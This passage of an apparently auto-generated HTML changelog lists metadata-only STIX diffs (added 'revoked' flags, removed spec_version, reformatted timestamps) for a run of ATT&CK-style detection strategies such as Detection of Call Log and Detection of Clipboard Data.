solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0711] Detection of Broadcast Receivers</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0674] Detection of Calendar Entries</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0703] Detection of Call Control</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0602] Detection of Call Log</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0643] Detection of Clipboard Data</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0619] Detection of Code Signing Policy Modification</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0655] Detection of Command and Scripting Interpreter</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0649] Detection of Compromise Application Executable</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0712] Detection of Compromise Client Software Binary</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0604] Detection of Compromise Hardware Supply Chain</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0704] Detection of Compromise Software Dependencies and Development Tools</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0721] Detection of Compromise Software Supply Chain</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0659] Detection of Conceal Multimedia Files</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0679] Detection of Contact List</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0633] Detection of Credentials from Password Store</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0671] Detection of Data Destruction</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th 